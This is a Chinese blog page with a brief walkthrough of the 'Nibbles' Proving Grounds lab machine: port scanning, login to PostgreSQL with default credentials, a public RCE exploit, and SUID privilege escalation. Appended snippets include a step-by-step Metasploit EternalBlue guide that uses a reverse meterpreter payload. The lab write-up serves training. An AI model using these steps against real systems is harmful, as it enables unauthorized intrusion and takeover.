PG靶机复现 Nibbles

最新推荐文章于 2025-06-27 23:06:20 发布
原创 最新推荐文章于 2025-06-27 23:06:20 发布 · 225 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

枚举

nmap -sC -sV -T4 -Pn -n -p- 192.168.214.47

在这里插入图片描述
发现5437端口开启,google一下版本
在这里插入图片描述
在这里插入图片描述
可能存在RCE,但是利用需要凭证

利用

在这里插入图片描述
这里猜测一下,使用postgres : postgres 成功进入,运气不错
在这里插入图片描述
利用代码成功,拿到shell

提权

在这里插入图片描述
在这里插入图片描述
上传linPEAS枚举,发现suid find可以利用
在这里插入图片描述
成功

OSCP考试练习 PG SpiderSociety靶机复现
qq_33522010的博客
05-28 195
oscp靶机练习
liceo靶机复现
m0_72372037的博客
04-30 635
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Liceo本机环境:NAT模式下,使用VirtualBox。
PG靶机复现 workaholic--Shared Libraries提权
qq_33522010的博客
06-25 328
发现3个端口通过wpscan扫描发现三个用户并且发现插件google一下发现存在sql注入,使用poc程序拿到三个用户的hash,然后使用hashcat拿到其中两个用户的charlie可以成功登陆,但是不是admin没有什么权限可以利用,回到FTP这里需要使用主动模式发现是wp目录文件下载配置文件发现密码。
PG靶机复现 Squid
qq_33522010的博客
06-27 256
官方定义为easy级别,因为省略了提权阶段,这个靶机主要是利用3128 Squid服务。
BlackMarket靶机复现
weixin_52956666的博客
08-07 1465
因为squirrelmail是web邮箱应用,存在 CVE-2017-7692 远程代码执行漏洞,但是得有一个用户可以登陆进去。因为 内核版本是4.4.0-31-generic,可以进行脏牛 CVE-2016-5195 提权。并且发现一句话Jason Bourne Email access?抓包,去查看,发现存在id值,这里先尝试改为1,因为大部分高权限用户都是1。尝试squirrelmail,squirrelmail。进入后发现没东西,一点发现有个隐藏的输入框。
Tomato靶机复现过程
weixin_67729650的博客
08-04 2366
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
脏牛提权(靶机复现
lza20001103的博客
04-20 1363
脏牛提权(靶机复现
XXE漏洞靶机复现
C233333235的博客
07-25 634
然后再次回去登录进行抓包(因为管理员登陆页面没有xxe,所以回到第一个登陆页面),然后用如下代码替换xml语句(后来发现不用重新抓包,一直用重放器里的请求包就行)他说flag在这个里面,所以据推测这也是一段编码文字,我们再次拿去解码,试了base64后发现解码失败,我们再试试base32,发现解码成功了.像之前一样再次拿去登陆抓包中,用xml语句进行查询,语句如下(后来发现不用重新抓包,一直用重放器里的请求包就行)但是这仍然不是我们要的路径,再次拿去解码,这次又变成了base64,解码成功。
IMF靶机复现
weixin_43999483的博客
02-23 568
IMF靶机复现 发现靶机IP:192.168.8.198 搜寻开放端口,发现除了80端口外,没发现其他端口。 使用dirb 撞靶机的子域名 dirb http://192.168.8.198 并没有找到有用的域名 F12手动查找Flag 在contact.php中找到注释的Flag1 搜寻== 发现后三行乱码 疑似Flag,组合base64解码得到 对flag2的内容进行再解码,得到 : 可能是用户名密码或者是子域名,猜测得到网址192.168.8.198/imfadministrator
decoy靶机复现
weixin_52956666的博客
08-19 870
使用root用户,运行0.49版本的chkrootkit程序,也就是通过使用命令/usr/bin/touch /dev/shm/STTY5246,或者使用程序honeypot.decoy的功能5 Launch an AV Scan.,或者甚至什么也不做,来调用root用户运行0.49版本的chkrootkit程序。pspy是Linux系统的进程监控工具,可以记录进程的运行情况,包括启动进程的命令,一定程度上类似于详细版的history命令。当用户为root用户,运行0.49版本的chkrootkit程序。
精选资源
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
精选资源
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8850
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于SSM与Vue架构的病人跟踪治疗信息管理系统设计与实现(含源码及文档)
12-22
基于SSM架构与Vue技术构建的病人治疗追踪管理系统,采用Java编程语言实现业务逻辑,并以MySQL数据库作为数据存储支持。该系统主要包含三个用户角色:管理员、病人及普通访客。 管理员具备的功能模块包括:主界面、个人设置、病人档案管理、病例信息采集、预约安排、医生信息维护、核酸检测报告上传管理、行动轨迹记录管理、疾病分类配置、病人治疗进度跟踪、留言板处理以及系统参数管理。病人用户可操作:主界面、个人设置、病例信息查看、预约申请、医生查询、核酸检测报告上传、行动轨迹上报、个人治疗状态查询。访客端提供:首页浏览、医生信息展示、医疗资讯发布、留言反馈提交、个人中心、后台入口及在线咨询服务。 系统设计注重代码结构的清晰性与可维护性,强调功能实用性和界面简洁度,同时保持较强的扩展适应能力,便于后续功能升级与日常运维。 项目已通过实际运行测试,开发环境配置如下: - 编程语言:Java - 开发框架:Spring Boot - Java开发工具包:JDK 1.8 - 应用服务器:Tomcat 7 - 数据库系统:MySQL 5.7 - 数据库管理工具:Navicat 12 - 集成开发环境:Eclipse或IntelliJ IDEA - 项目构建工具:Maven 3.3.9。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
电力系统单机无穷大电力系统短路故障暂态稳定Simulink仿真(带说明文档)
最新发布
12-22
【电力系统】单机无穷大电力系统短路故障暂态稳定Simulink仿真(带说明文档)内容概要:本文档围绕“单机无穷大电力系统短路故障暂态稳定Simulink仿真”展开,提供了完整的仿真模型与说明文档,重点研究电力系统在发生短路故障后的暂态稳定性问题。通过Simulink搭建单机无穷大系统模型,模拟不同类型的短路故障(如三相短路),分析系统在故障期间及切除后的动态响应,包括发电机转子角度、转速、电压和功率等关键参数的变化,进而评估系统的暂态稳定能力。该仿真有助于理解电力系统稳定性机理,掌握暂态过程分析方法。; 适合人群:电气工程及相关专业的本科生、研究生,以及从事电力系统分析、运行与控制工作的科研人员和工程师。; 使用场景及目标:①学习电力系统暂态稳定的基本概念与分析方法;②掌握利用Simulink进行电力系统建模与仿真的技能;③研究短路故障对系统稳定性的影响及提高稳定性的措施(如故障清除时间优化);④辅助课程设计、毕业设计或科研项目中的系统仿真验证。; 阅读建议:建议结合电力系统稳定性理论知识进行学习,先理解仿真模型各模块的功能与参数设置,再运行仿真并仔细分析输出结果,尝试改变故障类型或系统参数以观察其对稳定性的影响,从而深化对暂态稳定问题的理解。
这是一个基于Prisma和SQLite数据库构建的现代化轻量级且开箱即用的个人作品集展示平台后端服务系统_该项目核心功能包括用户认证授权作品数据模型管理文件上传存储以及提供标.zip
12-22
这是一个基于Prisma和SQLite数据库构建的现代化轻量级且开箱即用的个人作品集展示平台后端服务系统_该项目核心功能包括用户认证授权作品数据模型管理文件上传存储以及提供标.zip
基于PSO算法优化支持向量机参数的MATLAB仿真源码:SVM与PSO-SVM性能对比
12-22
本研究聚焦于运用MATLAB平台,将支持向量机(SVM)应用于数据预测任务,并引入粒子群优化(PSO)算法对模型的关键参数进行自动调优。该研究属于机器学习领域的典型实践,其核心在于利用SVM构建分类模型,同时借助PSO的全局搜索能力,高效确定SVM的最优超参数配置,从而显著增强模型的整体预测效能。 支持向量机作为一种经典的监督学习方法,其基本原理是通过在高维特征空间中构造一个具有最大间隔的决策边界,以实现对样本数据的分类或回归分析。该算法擅长处理小规模样本集、非线性关系以及高维度特征识别问题,其有效性源于通过核函数将原始数据映射至更高维的空间,使得原本复杂的分类问题变得线性可分。 粒子群优化算法是一种模拟鸟群社会行为的群体智能优化技术。在该算法框架下,每个潜在解被视作一个“粒子”,粒子群在解空间中协同搜索,通过不断迭代更新自身速度与位置,并参考个体历史最优解和群体全局最优解的信息,逐步逼近问题的最优解。在本应用中,PSO被专门用于搜寻SVM中影响模型性能的两个关键参数——正则化参数C与核函数参数γ的最优组合。 项目所提供的实现代码涵盖了从数据加载、预处理(如标准化处理)、基础SVM模型构建到PSO优化流程的完整步骤。优化过程会针对不同的核函数(例如线性核、多项式核及径向基函数核等)进行参数寻优,并系统评估优化前后模型性能的差异。性能对比通常基于准确率、精确率、召回率及F1分数等多项分类指标展开,从而定量验证PSO算法在提升SVM模型分类能力方面的实际效果。 本研究通过一个具体的MATLAB实现案例,旨在演示如何将全局优化算法与机器学习模型相结合,以解决模型参数选择这一关键问题。通过此实践,研究者不仅能够深入理解SVM的工作原理,还能掌握利用智能优化技术提升模型泛化性能的有效方法,这对于机器学习在实际问题中的应用具有重要的参考价值。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
jank_record_1766403318764055404.pb
12-22
jank_record_1766403318764055404.pb
分层模糊系统:梯度下降与递推最小二乘法联合辨识研究(Matlab代码实现)
12-22
分层模糊系统:梯度下降与递推最小二乘法联合辨识研究(Matlab代码实现)内容概要:本文围绕“分层模糊系统:梯度下降与递推最小二乘法联合辨识研究”展开,介绍了基于Matlab代码实现的分层模糊系统参数辨识方法。通过结合梯度下降法和递推最小二乘法,实现对系统结构和参数的高效联合辨识,提升模型精度与收敛速度。文中详细阐述了算法原理、实现步骤及仿真验证过程,展示了该方法在非线性系统建模与辨识中的有效性,适用于复杂动态系统的建模与控制研究。; 适合人群:具备一定Matlab编程基础和系统辨识理论背景的研究生、科研人员及自动化、控制工程等相关领域的技术人员。; 使用场景及目标:①应用于非线性动态系统的建模与参数辨识;②用于提高模糊系统训练效率与预测精度;③支持科研复现、算法优化及工程实际中的系统辨识任务; 阅读建议:建议读者结合提供的Matlab代码进行实践操作,深入理解两种优化算法的融合机制,并尝试在不同数据集或应用场景中进行迁移与改进,以掌握其核心思想与实现技巧。
msf复现永恒之蓝靶机搭建
07-12
### 环境搭建与配置 为了成功复现 EternalBlue 漏洞,首先需要准备好实验环境。靶机选择 **Windows 7** 系统,IP 地址为 `192.168.244.133`;攻击机使用 **Kali Linux**,IP 地址为 `192.168.244.136`。所需工具包括 `nmap` 和 `metasploit-framework (MSF)`,这些工具默认集成在 Kali 系统中[^1]。 #### 靶机准备 - 安装 Windows 7 系统,并确保未安装补丁 KB4012598(该补丁修复了 MS17-010 漏洞)。 - 关闭防火墙或允许 SMB 协议通过。 - 确保系统开启了文件共享功能,SMB 服务运行正常。 #### 攻击机准备 - 安装 Kali Linux 并更新系统。 - 安装 Metasploit Framework,可通过命令 `sudo apt install metasploit-framework` 进行安装。 - 确认 nmap 已安装,用于网络扫描和端口探测。 ### 使用 Metasploit 复现 EternalBlue 漏洞 #### 启动 Metasploit Framework 打开终端并输入以下命令启动 Metasploit: ```bash msfconsole ``` 进入 Metasploit 控制台后,输出信息显示当前版本及模块数量,如下所示: ``` =[ metasploit v6.3.27-dev ] + -- --=[ 2335 exploits - 1220 auxiliary - 413 post ] + -- --=[ 1385 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] ``` #### 搜索 EternalBlue 模块 在 Metasploit 控制台中执行以下命令搜索相关模块: ```bash search eternalblue ``` 系统将列出多个与 EternalBlue 相关的模块,例如 `exploit/windows/smb/ms17_010_eternalblue`。选择该模块进行漏洞利用: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` #### 设置目标与负载 查看模块所需的参数: ```bash show options ``` 主要需要设置以下参数: - `RHOSTS`: 靶机 IP 地址,即 `192.168.244.133` - `LHOST`: 攻击机 IP 地址,即 `192.168.244.136` 设置参数命令如下: ```bash set RHOSTS 192.168.244.133 set LHOST 192.168.244.136 ``` 默认情况下,模块会使用合适的 payload,如 `windows/x64/meterpreter/reverse_tcp`。若需更改 payload,可使用 `set payload` 命令指定。 #### 执行漏洞利用 完成所有设置后,执行漏洞利用: ```bash exploit ``` 如果一切顺利,Metasploit 将尝试连接靶机并通过 SMB 协议发送恶意数据包,最终获得 Meterpreter 会话。 #### 成功获取 Meterpreter 会话 一旦漏洞利用成功,控制台将显示 Meterpreter 提示符,表示已成功获取目标系统的控制权。此时可以执行多种操作,如上传文件、执行命令等。 ```bash meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` 上述结果显示当前权限为 `NT AUTHORITY\SYSTEM`,即最高权限,说明漏洞利用成功。 ### 注意事项与防御建议 - **测试环境隔离**:确保实验环境与生产网络隔离,避免误伤真实系统。 - **漏洞修复**:微软已于 2017 年发布补丁 KB4012598 修复此漏洞。对于实际环境中未打补丁的系统,应尽快安装官方补丁。 - **SMB 协议防护**:企业网络中应限制 SMB 协议的外部访问,关闭不必要的共享服务,启用防火墙规则阻止非法 SMB 请求。 - **入侵检测**:部署 IDS/IPS 系统,监控异常 SMB 流量,及时发现类似 EternalBlue 的攻击行为。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值